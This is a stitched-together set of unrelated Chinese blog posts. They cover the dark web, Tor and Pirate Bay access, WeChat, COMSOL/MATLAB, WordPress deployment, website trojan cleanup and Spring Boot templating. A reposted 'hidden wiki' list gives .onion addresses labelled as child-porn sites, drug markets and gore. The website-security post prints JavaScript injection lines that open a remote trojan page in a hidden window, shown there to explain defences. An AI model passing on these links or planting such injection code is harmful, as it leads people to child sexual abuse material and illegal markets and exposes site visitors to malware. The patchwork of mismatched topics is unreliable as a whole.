Life

An网有多可怕?其实你也曾游离在它边缘

暗网、深网、互联网究竟是什么关系 “你听说过暗网吗?” 当我把这个问题抛给不同人群,得到了几乎全部是肯定的回答,我意识到,这或许是暗网第一次如此广泛的被全社会认知,即便是年过五旬中老年人,在面对这个问题时也不再显得那么的事不关己。 暗网这个原本局限在IT行业和部分非法业务群体中的名词,在2017年因为中国访美学者章莹颖遇害第一次如此广泛的被大众所认知。对于多数人而言,暗网是一个可怕的地方,它甚至一定程度上导致了犯罪行为的发生。我们且不讨论,是不是当所有人都读“王子与公主/灰姑娘终于幸福的生活在一起”的童话,就会实现和谐社会。但是,本文试图告诉大家,暗网本质是什么,它是不是真的那么可怕。 暗网、深网、互联网究竟是什么关系 如今我们每个人都上网,我们大多数时间所说的”上网”和”联网”都指的是与互联网的连接,它始于1969年美国的阿帕网,也就是现在的因特网。 暗网不同于深网 但如果你在维基百科上搜索”暗网”为关键词,会发现它特别标注了”提示:本条目的主题不是深网。”说明暗网与深网有着明显的不同,而这一点被很多人所混淆:暗网与深网并不是一个概念。 暗网和深网实际上都是从英文翻译来的,暗网即dark Darknet或Dark Web;深网则译为Deep Web、Dark Web。从概念来讲,暗网是指需要通过特殊软件、特殊授权、或对电脑做特殊设置才能连上的网络;深网的概念是指互联网上那些不能被标准搜索引擎索引的非表面网络内容。简单来说,暗网是深网的一个子集。 一图看懂互联网、深网与暗网 对暗网有过了解的人应该都听过类似的表述:在网络世界也有着一套冰山理论。即我们平时能看到的网络(或者说互联网)只占整个网络中的4%-5%,也可以称之为”明网”,超过整个数据量的95%都隐藏在冰山之下,在冰山之下,存在着很多见不得光的东西,包括暴力、犯罪……简单来看,上面的表述似乎没有问题,事实上这种表述存在严重的逻辑漏洞和偷换概念,容易给人造成误导。 登入暗网的实现方式 强大的需求使暗网长盛 对于暗网,我们不但要知其然,还要知其所以然。为什么会存在暗网呢,更确切地说,暗网的实现逻辑和存在逻辑分别是什么?暗网也被称作”隐藏的服务器”,其域名数量达到表层网络的400-500倍。像纸牌屋中形容的那样:”96%的互联网数据无法通过标准搜索引擎访问,虽然其中的大部分属于无用信息,但那上面有一切东西,儿童贩卖、比特币洗钱、致幻剂、大麻、赏金黑客……” 暗网教学视频 但那些,只是暗网中的很小一部分。(注释:96%无法通过搜索引擎搜索到的是深网,并非暗网。)从暗网的定义中可以看到,暗网是需要通过特殊软件、授权才能连接的网络。也就是说,从实现逻辑上来讲,暗网不是随随便便就能进入的,暗网链接需要一定的契约、技术手段和资金支付。 Tor服务 虽然Tor 项目联合创始人 Roger Dingledine 指出,大部分 Tor 用户访问 Tor 隐藏服务,只是想隐藏身份,并对出席 DEF CON 会议的与会者表示,暗网没有真的存在,它们只是少许网页。 暗网中Tor结构(图片来自freebuf) 但是,这不能否定一个反向的逻辑,即大多数登入暗网的人都是通过Tor洋葱网络实现的(当然也有部分通过I2P隐形互联网项目连接)。Tor,这个由美国情报局发明的工具,戏谑性的成为如今大多数人进入暗网的首选方式。 强大的需求使暗网长盛:利益 从技术上来讲,登录暗网需要进行一些预设,也需要VPN。而在整个网络生态上来讲,暗网的存在也似乎是顺理成章的。 silk road丝绸之路 以2013年被曝光的”silk road丝绸之路”为例,在这个网站上,可以买到毒品、强制、性奴、儿童色情,甚至是人体器官。用网站创始人乌布利希的话来说”我要创建一个经济仿真体,让人们体验:生活在一个没有系统化权利使用的世界里是什么样子的。”不受束缚的欲望和资本积累需求,成为暗网存在逻辑中最重要的因素,也成为暗网长盛的关键。 暗网创始人罗斯·威廉姆斯·乌布利希 silk road网站诞生于2011年,由曾经的天才好学生罗斯·威廉姆斯·乌布利希自学编程创建。网站需要有Tor作为入口登录,利用比特币的区块链去中心化、无法追踪的特性,全站采用比特币交易。在这个不见光的网络中,购买非法物品时又都是光明正大的。利用这个黑暗版淘宝,silk road创始人从每笔交易中抽成8%-15%,在2011-2013短短两年中,实现了12亿美金的资本积累…… silk road之后 千万个暗网崛起(注:最下方绿色为丝绸之路) 暗网是整个网络中的一部分。对于silk road这种资金积累和生态模式,显然有人很受用。在2013年silk road倒下之后,千千万万的silk road,甚至是加强版silk road出现。另一方面来讲, 网络发展到现在,仅中国网民规模就已经达到6.68亿,全球的网民数量和联网设备、服务器数量之庞大,都是普通人难以想象的。服务器为我们提供了网互联世界中几乎所有的快速计算需求,而并不是所有服务器的数据都是公开的,这样暗网的存在就成为了一种必然。 辨别暗网上的那些真与假 暗网上的那些真与假 由于章莹颖案的触发,暗网再次成为一个热点话题,虽然很多你能搜到的暗网传说都是假的,准确的说是缺乏依据的(比如与外星人的道西战争)。但是不得不承认,在暗网上,你能购买非法物品:伪币、美国护照、海洛因、枪支等,能够肆意分享短片、发布极端思想博客,甚至洗钱。 传说中与外星人的道西战争 为了给大家一个具象化的直观感受, 笔者引用一个发生在日本的案例。在2007年8月25日,31岁的外派公司职员矶谷利惠在日本千种区遇害,尸体被丢弃在岐阜县瑞浪市的山林中。案发不足一日,警方接到一通自首电话,使得案件在24小时内破案。 矶谷利惠儿时与母亲合照 经调查发现,三名犯罪嫌疑人均处于无业游民状态,年龄分别为40岁、36岁和31岁(36岁神田司为《朝日新闻》推销员),三人相识不过一周的时间。而让他们相互建立犯罪同盟关系的,只是一个需要密码才能进入的匿名BBS,一个叫做”暗职介绍所”的暗网。这个网站藏在暗处,以名古屋为中心,网址是由乱码一样的字符组成,有效地避开了警方的监督,成为非法获利活动的据点。 八年后 神田司被判处死刑 在暗网中,类似的非法活动有很多。但是根据Terbium Labs的一项研究表明,暗网并没有我们想象的那么黑暗,大约55%的暗网内容是合法的。 当我们在谈论暗网时,是在谈论什么 你也曾游离在暗网的边缘? 什么是暗网?针对这个问题,在笔者采访的不同对象中得到了几种不太相同的答案。有人说,暗网是个可怕的存在,很多人因为上了暗网变得边缘化;有人说,暗网这个描述不够准确,暗网其实只是不在现在大家常见的互联网这个局域网中的网络;也有人说,暗网就是”丝绸之路”,是导致章莹颖遇害的重要通道,在暗网上,涉毒、洗钱、人口贩卖、涉黑等恐怖暗罪视频、图片比比皆是……

微信小程序下拉刷新事件无效原因

1.页面json文件中没有开启enablePullDownRefresh配置 2.请在真机调试中调试(开发工具下拉事件监听不到) tip: q:有下拉页面移动效果,没有刷新加载动画 a:加载动画颜色跟背景色重叠,设置json文件”backgroundTextStyle”: “dark” q:下拉后页面不返回顶部 a:没有调用结束下拉刷新动画方法 js文件 onPullDownRefresh: function () { console.log('下拉') wx.startPullDownRefresh() setTimeout(()=>{ wx.stopPullDownRefresh() },2000) } json文件 { "backgroundTextStyle": "dark", "enablePullDownRefresh": true }

通过Tor浏览器访问deep web和dark web++++++++++ideal

1.打开网址http://www.theonionrouter.com/ 2.点击Download Tor进行下载 3.下载之后进行配置 . 4.是否使用代理,点击否,下一步 . 5.防火墙是否仅允许特定端口的互联网连接,点击否,下一步 . 6.互联网提供商(ISP)是否对Tor网络连接进行了封锁或审查?点击是,下一步 . 7.使用集成的网桥进行连接,传输类型为:fte,然后点击连接。 . 8.这样就连接成功了 . 9.打开一个后缀名为.onion的网站。 (以上就是我的方法,开车要小心,扶好方向盘!) (现在我发现上面的方法已经失效,下次补充新的)

深网—藏在冰山一角下的网络

藏在冰山一角下的网络 附: Tor洋葱浏览器 我们日常所用到的全部网站,都可以通过谷歌、百度等搜索引擎来搜索,这样的网站我们称之为表层网站(Surface web)。这些网站的名称往往比较好记,不需要任何特殊的技术或工具,只用普通的浏览器就可以进入这些网站。 然而,有另外许多网站,它们是无法通过搜索引擎来搜索到的,只有通过特殊的工具和浏览器,你才能看到网站中的部分内容。这些网站被称为 深网(Deep web)。 在网络世界里,有96%的内容都是埋在这些深网之中的,而我们能看到表层网站,仅占全部网络世界的4%。 深网中的访问者,可以通过浏览器的加密和反追踪技术,完全匿名地发送加密信息,深网域名都是以 .onion 结尾,由于隐蔽性,又恰好符合了很多访问者的不可告人的目的。比如: 贩卖赃物、军火、走私品、毒品及违禁药品 窃取电子商务网站用户数据库后,对个人信用卡信息进行贩卖 制作及出售色情影片、暴力影片 洗钱,以及匿名转移资金 伪造身份证件、护照等 策划犯罪活动 在比特币(BitCoin)等不记名虚拟货币出现之后,暗网的交易活动变得更加简单:一切交易都可以通过虚拟货币转入匿名账户,而避免了从银行系统转账后被警方跟踪的风险。 而在深网中,这些与犯罪具有高度关联的网站,便被称为「 Dark web」,所以把Dark web称之为Deep web是错误的。 深网域名之所以以 .onion 结尾,是因为onion是洋葱的意思。大部分的Deep web使用匿名的Tor技术或使用类似的软件如I2P等。这类软件会加密网络流量并随机挑选位于世界各地的计算机传输数据,类似于剥洋葱,加密过的数据会在每次传输后“剥开”加密层。从理论上讲,哪怕是数据源到数据目的地都被控制,这种技术也完全可以避免窃听和审查。 一般而言,当用户使用Tor后,浏览的任何网站都不可能很轻易的看到用户真实的IP地址。但当一个网站也同样使用了Tor隐藏技术后,只有同样使用Tor技术的用户才能够访问。对与使用Tor技术的网站和用户,数据都要经过三次随机的跳转才能够“碰面”。 虽说网站的IP地址是隐藏的,然而却并不意味着这一切都是绝对的秘密。任何人使用Tor并知道网站的地址(通常以.onion结尾)都可以访问这些非法的在线市场。Deep web上的一些网站也有很多“高端服务”,也就组成了Dark web。而Dark web由于其隐蔽性很高,不通过技术手段是很难访问到的,其实Dark web展现的是网络中人性的阴暗面。 记住凝望深渊的同时,深渊也会凝望着你。

进入海盗湾的正确姿势

由于海盗湾属于暗网网站,经常被和谐掉,并且上去寻找东西需要耐心等待,下面就来说说如何进入: 第一步:下载洋葱漏油器并安装 第二步:打开洋葱路由进行设置,并找到三个代理地址和端口,进入路由界面 第三步:安装翻译组件,并设置 第四步:打开暗网导航,找到海盗湾正确暗网地址(ps:还可以对洋葱路由安全设置以及匿名等进行设置) 第五步:进入海盗湾网站,进行资源下载 如有问题,或者想知道如何科学上网,联系博主,或者下方留言!!!!

comsol LiveLink with matlab联合仿真入门及心得

版本:5.3a和2017b comsol与matlab联合仿真的内容在LiveLink的介绍中用于MATLAB中讲的还比较清晰。如果在网上找不到文档可以在文件 – 帮助 – 文档最下面找到,同时COMSOL Multiphysics Programming参考手册这个文档是在COMSOL Multiphysics节点下面的,可以学习一下这种编程方式。 但是在matlab到comsol文件保存讲的有点模糊了,本来用的比较多的也是使用matlab处理重复的工作、数值计算、 使用随机函数绘制一些特殊的几何,调用函数等等真正用编程的形式来整个建模还是比较麻烦的。 1.点击COMSOL Multiphysics 5.3a with MATLAB桌面图标,第一次需要自己输入用户名和密码。 进入matlab之后会有如下图的显示: 2.点击comsol,在首选项 – 安全性勾选允许使用外部MATLAB函数; 3.点击主屏幕中的函数-matlab函数,函数名与后面输出的函数名相同即可; 4.点击文件-COMSOL Multiphysics Server-连接到服务器; 5.在MATLAB中中输入自己的函数,保存为.M文件,同时仿真文件也要保存在同一路径下面,但是这个保存的地方有点坑使用手册上写的如下:将文件保存在MATLAB下的用户文档文件夹中作为heatflux .M。将文件保存在此位置(/ Documents / MATLAB)可确保MATLAB在COMSOL调用该函数进行评估时找到该函数。我根本没有找到这个文件,把文件存放在其他地方一直报错。后来将文件存放在C盘下面才不报错了,调用外部函数一切正常。

【转载】hidden wiki urls

暗网网址集合 转自 https://blog.csdn.net/qq_36561697/article/details/82193063 http://newmap.norsecorp.com/ norse attack map http://22u75kqyl666joi2.onion/ 暗网中文论坛 http://reloadedudjtjvxr.onion/road.php 丝绸之路3.0 http://www.normalpornfornormalpeople.com/ normal人体试验血腥网址(需要账号) http://prnstmrpfkgkaw5v.onion/ 小福利 http://iuhcjx6fpeafstuu.onion/ Scream bitch! http://6soqvgf7mrjc7w3j.onion/bbs/index.php 114中文论坛 http://6soqvgf7mrjc7w3j.onion/chat/blab73/index.php 114聊天室 (马克斯AKeD jasonlee1573) http://xmi6ngumdv6ohjbm.onion/ 天堂庄园CP网址 http://smok6do2tvv6ekv2.onion/ SMOKEBLES http://kpvz7kpmcmne52qf.onion/wiki/index.php/Main_Page uncensore hidden wiki http://bdpuqvsqmphctrcs.onion/ Anarchy网址导航 http://xkow4dnkw7cusncz.onion/ 暗网中文论坛2 http://rfwtogljhrrzxyrl.onion/ lolita city http://mail2tor2zyjdctd.onion/ Mail2tor邮箱 http://underdj5ziov3ic7.onion/category/CHINESE 中文网址导航 http://eg63fcmp7l7t4vzj.onion/ 秘密树洞 http://opea6td2pg66qouf.onion/ torbay论坛中文 http://wiki5kauuihowqi5.onion/ – Onion Wiki http://newpdsuslmzqazvr.onion/ drug http://postits4tga4cqts.onion/ matrix留言板 http://kbhpodhnfxl3clb4.onion/ tor搜索引擎 http://loupsycedyglgamf.onion/PSYC/?room=EDN 聊天室 http://www.glowing-bear.org/ glowing bear聊天室 http://b4d3igwmoo5355ur.onion/greatc/login.php 中文聊天室 挂了 http://32pbf32xi6ccm63z.onion/blog/temas/living-room/ 成人porn直播间 http://www.onion.link/ onion city搜索引擎

建站教程(三):在Ubuntu上如何基于Nginx部署WordPress

本教程介绍如何在Ubuntu系统下基于Nginx部署搭建WordPress。包括下载WordPress,创建WordPress操作的MySQL数据库和用户,配置WordPress,在Nginx中配置WordPress以及安装WordPress。 下载WordPress 直接通过wget命令去它官网下载最新的版本: wget http://wordpress.org/latest.tar.gz 解压: tar -xzvf latest.tar.gz 创建WordPress操作的数据库和用户 用在建站教程(二):Ubuntu上如何配置Nginx+MySQL+PHP7(LNMP)中创建MySQL时设置的root密码登录MySQL: mysql -u root -p 创建数据库: CREATE DATABASE wordpress; 创建用户: CREATE USER wordpress@localhost; 设置密码: SET PASSWORD FOR wordpress@localhost=PASSWORD("your password"); 配置权限: GRANT ALL PRIVILEGES ON wordpress.* TO wordpress@localhost IDENTIFIED BY 'your password'; 刷新权限配置: FLUSH PRIVILEGES; 退出MySQL: QUIT; 配置WordPress 重命名示例文件wp-config(此处的路径/root/wordpress对应你自己的存放路径): mv /root/wordpress/wp-config-sample.php /root/wordpress/wp-config.php 修改配置文件内容: vi /root/wordpress/wp-config.php 修改的内容包括DB_NAME,DB_USER,DB_PASSWORD以及下面的唯一key,其中前三个是在第二步自己设置的内容,唯一key可以直接去它提供的网站上拷贝,修改后的文件如下所示: 配置Nginx 根据建站教程(二):Ubuntu上如何配置Nginx+MySQL+PHP7(LNMP),Nginx的root路径是/var/www/html,所以讲wordpress里面的内容拷贝到此路径下: cp -r /root/wordpress/* /var/www/html 修改权限(这些文件都是root的,而Nginx默认是www-data用户来运行,所以没有权限写入root的文件): chown -R www-data:www-data /var/www/html 如果按照第二步配置了,那么default的配置文件内容不需要修改了,如果没有修改,请戳-> 建站教程(二):Ubuntu上如何配置Nginx+MySQL+PHP7(LNMP) 重启Nginx:

网站被挂马的处理办法以及预防措施

喜欢的朋友可以关注下。 相信很多的朋友都有遇见过,通过百度快照访问一个网站被跳转到另一个目标网站。 这就说明网站被劫持了,那么黑客为什么要劫持这些网站呢?黑客一般选择什么样的网站下手?下面我们就一起分析一下。 首先黑客一般都会选择信息类网站,购物网站等,因为这些网站的IP高,劫持这些网站能达到他们的引流目的。我们这来做一个假设,如果有100个用户准备访问A网站,但都被劫持到B网站了,那么只是会有10%的用户会对B网站产生兴趣,那么他们的引流目的就达到了,对于A网站而言,他们就损失了部分用户,这是他们不愿看见的,所以他们是很痛恨黑客的。 当然被黑客劫持的网站往往他们都会引流到一些菠菜类的网站,相信很多人看了都会有去搏一搏的心态,一玩不要紧,如果你的控制能力很差的话,那么你就深深的陷入了,这是一个吃人不吐骨头的,这里还是温馨的提醒大家 不要有赌博的心态,不说题外话了,下面我们就一起来看看所谓的木马。 首先,我们需要弄清楚黑客一般是通过哪些渠道来给网站挂木马的。 1.通过漏洞(例如一个软件的漏里,给你的服务器上传一些命令脚本) 2.破解你的服务器账号密码,创建子用户,任意上传脚本文件 这里我来例举一些常见的木马脚本命令: 现在最多见的JS挂马方法有两种,一种是直接将JavaScript脚本代码写在网页中,当访问者在浏览网页时,恶意的挂马脚本就会通过用户的浏览器悄悄地打开网马窗口,隐藏地运行。 这种方法使用的关键代码如下: window.open("http://www.mahaixiang.cn/木马.html","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1"); 这种代码往往很长,很容易被安全工程师发现,而且没有经验的黑客也喜欢将“width”和“height”参数设为“0”,但是设置为0后,可能会出现恶意代码不运行的情况。 另外一种JS挂马方式是,黑客先将挂马脚本代码“document.write(‘<Iframe src=”网页木马地址” > 或者 document.write("") document.write("") document.write("") 还有这种方式 这个图大家都能看明白,这就黑客的攻击流程。 其次,当我们发现自己的网站被挂马了,改如何来做呢? 当你的网站文件不是很多时,那么你可以一个一个来查看,看见陌生的代码,这时你就需要注意了,有可能就是木马了。 那么如果你的文件有成千上万个,自己一个一个的看那不是要看到眼花,这里我给大家推荐一款免费的查找工具护卫神,下面我把工具分享给大家需要可以下载 https://download.csdn.net/download/dsn727455218/10592371 这里面,是有三款软件,其一就是木马查找工具,已经防篡改工具,及防攻击的 上面介绍的是用工具来防止被挂马,那么我们通过代码来如何实现呢,一起来看看 防第一种JS挂马方式,不方便,用得非常少,而第二种JS挂马方式才是当前主流的,所以我们主要针对它进行防御。方法就是阻止Src请求的异地外域的JS脚本,代码如下: iframe{mdy1:expression(this.src='about:blank',this.outerHTML='');} script{mzm2:expression((this.src.toLowerCase().indexOf('http')==0)?document.write('木马被成功隔离!'):'');} 不过这种方法的缺点就是网站的访问者将不能看到被挂了JS木马的相关网页。 所以我们为安全工程师提供了一段可以中止JS脚本运行的CSS代码,这段代码会让异地外域的JS文件在使用document.write()时,被 document.close()强制关闭。这个时侯JS挂马的内容往往还没有来得及写完,只有部分被强制输出了,Writer后面的内容再不会被写入访 问者的电脑中,从而起到防范JS脚本挂马的作用。 让JS木马的进程迅速中止 在 之间加入如下代码: 屏蔽script和iframe 单屏蔽script 通过添加一个代码来防止被被人挂马。 下面我就给大家分享一下如何做好服务器安全工作: 1.对项目文件增加读写权限 2.服务器的密码不要用什么root,admin,123456这些很容易被试出来的,相信很多人都是用这个密码吧。 3.服务器限制IP登录,一般登录服务器基本上都是那么两个人可以设置白名单,其他的一律禁止登录 4.不定期的维护等 5.当然如果你们公司有钱,也可买付费产品,他们能防止的很多,我看阿里云的安骑士专业版一年的费用都是好几千,还不算其他的一些产品,相信很多的小公司,都不愿出这个钱,所以大家还是努力做好自己的防护措施。 如有需要可以加我Q群【308742428】大家一起讨论技术。 后面会不定时为大家更新文章,敬请期待。 喜欢的朋友可以关注下。 如果对你有帮助,请打赏一下谢谢。

Spring Boot实战——公共页

进行web开发的时候会经常遇到某些页面,它们的页面中某些地方是一样的,也就是说,这部分地方是公共的,每个页面的html代码都是一样的,这样的页面我们称为公共页。而本次实战中,我们要对公共页进行操作,简化公共页的繁杂性。 导言如下: (0)预准备 (1)抽取公共页 (2)点击高亮 (0)预准备 准备工作我曾经在Spring Boot实战——登录页中说过,其实步骤差不多,就是首先导入资源文件,我这次导入了两个公共页,并对其html代码进行部分修改,一个设置为主页(dashboard.html),另一个设置为副页(list.html)。项目目录结构如下: 其中我将公共部分放入了bar.html,这个我稍后会说。 除此之外,项目还要导入thymeleaf的依赖,导入bootstrap 的依赖,在html代码中加入thymeleaf的语法提示,这些我在登录页的实战中都有说,大家可以去看看。 下面展示两个html页面的公共部分的代码,核心部分代码因功能不同而做自行修改(*单纯代码是不会有页面渲染,还要加入css,js,图片才行): Company name Sign out 主页 (current) 员工管理 而完整代码运行效果如下: dashboard.html: list.html: 这时候我们准备就完成了,我们首先要做的就是页面可以登录,这时候我们需要编辑controller,而编辑之前我们需要对旁边的主页和员工管理页面进行部分修改: 而我们观察html中有两段是有关两个按钮的a标签,a标签中有href进行链接(先dashboard.html再list.html): 我们使用thymeleaf进行修改: 这时候我们编辑controller: @Controller public class MyController { //dashboard.html作为主页面 @RequestMapping({"/","/dashboard"}) public String dashboard(){ return "dashboard"; } //通过按钮“员工管理”跳转,通过get请求获取“/emp” @GetMapping("/emp") public String dashboardtolist(){ //返回的是emp目录下的list.html //而thymeleaf默认拼串,所以前面静态资源文件夹不用存在 return "emp/list"; } //通过按钮“主页”跳转,通过get请求获取“/dashboard” @GetMapping("/dashboard") public String backdashboard(){ return "dashboard"; } } (1)公共页抽取 抽取公共部分我们首先需要知道公共部分是那些,所以我们需要在浏览器中打开页面通过开发者工具(F12打开),使用开发者工具观察公共部分是哪些: 找到公共部分,及它们对应的代码,这时候在IDEA中对公共部分抽取出来放在新建的一个html文件(bar.html)中 这时候我们就需要使用的thymeleaf中对公共部分的操作了: (1)抽取公共片段 (将公共部分抽取出来) 公共部分代码 (2)引入公共片段 (在原先html代码中插入) 其中: ~{templatename::selector}:模板名::选择器